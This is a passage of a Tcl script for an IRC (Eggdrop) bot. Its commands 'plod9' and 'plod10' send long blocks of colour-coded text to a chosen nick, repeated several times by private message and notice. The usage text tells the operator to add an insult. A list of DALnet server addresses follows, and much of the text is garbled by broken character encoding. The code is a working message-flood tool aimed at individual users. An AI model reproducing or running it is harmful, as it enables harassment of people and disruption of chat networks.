puthelp "PRIVMSG $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW
11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" puthelp "NOTICE $person : $rest , 4,11Be�BeK 5�aD�uS 6�kAl�I 12W�ekZ� 13Wek�Z 14We�k 1ZW�ek 15�Wek�Z 7Wek�Z 9,1B�eBe�K 13aD�uS 12k�AlI� 4We�kZW 11e�kZ We 2k�ZWe 7k We�k 9ZWe�k 10Z 8,2Be�BeK� a 11D�uS �kA 9lI� We 7k�ZWe 0k�Z We�kZ 11We�k W�e 8kZ�We 13kZ� 13,9Be�Be 1K �aD 12u�S kA�l 3I �We 4k�ZWe 7kZ �Wek 4Z�Wek W 2e�kZW�e 11kZ 12,4�BeB 14e�K aD 15u�S kA�l 5I �Wek�Z 6We�kZ W�ek 1ZWek We�k 12ZWe�k 13Z 11,6�Be 1B�eK a�Du 2S kA�l 3I We 4k�ZWe 5k�Z We�k 7ZWe�k 8We�kZ 9W�ek 10Z� 0,14Be�BeK 14a�DuS� k 13Al�I W 9e�kZ�W 4ek�Z 11We�k 7ZW�ek W 8e�kZW 9e�kZ 4,11B�e�BeK a 12D�uS 3kA�l 6I W�ek 5ZW�ek 15Z �We 13kZ�Wek� W 9ekZ�W 2ek�Z 9,1B�eBe�K a 14D�uS �k 14AlI� W 13e�kZW�e 12kZ W�e 11kZW�ek 10Wek�Z 9We�kZ 8,2Be�BeK� 7aD�uS 6k�AlI 5 W�ek 4Z�Wek�Z 3 We�k 2ZW�ek 1W�ekZ�W 15ek�Z 13,9�Be 14B�eK 13a�DuS� k 12A�lI W�e 10kZW�ek 14Z �We 8kZ�Wek 7�WekZ�W 6ek�Z 12,7�BeBe�K 8aDu�S 13kA�lI 6We�kZ 5Wek�Z 4 Wek 3Z�Wek 2 We�kZ 1W�ekZ" putlog " � !$hand! plod9 $person" return 0 } if {$rest==""} { puthelp "NOTICE $nick :Lagi Usage: plod9 <*add your insult to injury is better :)*>" } } ## public cmd plod10 proc pub_plod10 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" puthelp "NOTICE $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2*
!� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" puthelp "PRIVMSG $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" puthelp "NOTICE $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" puthelp "PRIVMSG $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" puthelp "NOTICE $person : $rest , 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 1� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp 10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �# 7 [� Ko 8PeT �] 9 {� kOp10Et �} 11 %� Ko 12PeT � 13% @� kO 14pEt 15@ * kO 1pEt � 2* !� KoP 3eT �! 4#� kOp 5Et �# 6[� KoP 7eT �] { 8� kOp 9E t � 10} %� Ko 11PeT �% 12@� kO 13pEt 14@ 1* kO 2pEt � 3* !� K 4oPe 5T �! #� 6kOpE 7t �# [ 8� KoP 9eT �] 10 {� kO 11pEt �} 12 %� Ko 13PeT � 14% @� kO 15pEt @ 1* kOp 12Et � 3* !� Ko 4PeT � 5! #� kO 6pEt �#" putlog " � !$hand! plod10 $person" return 0 } if {$rest==""} { puthelp "NOTICE $nick :Lagi Usage: plod10 <*add your insult to injury is better :)*>"
} } ##### DALNET SERVER ####### set servers { irc.big.net.id:7000 irc.hotspeed.com.sg:7000 irc2.velo.net.id:3264 irc.indolayer.com:7000 irc.indolayer.com:8888 irc.indotransdata.net:6667 irc.visit.net.id:6667 } putlog putlog putlog putlog putlog putlog
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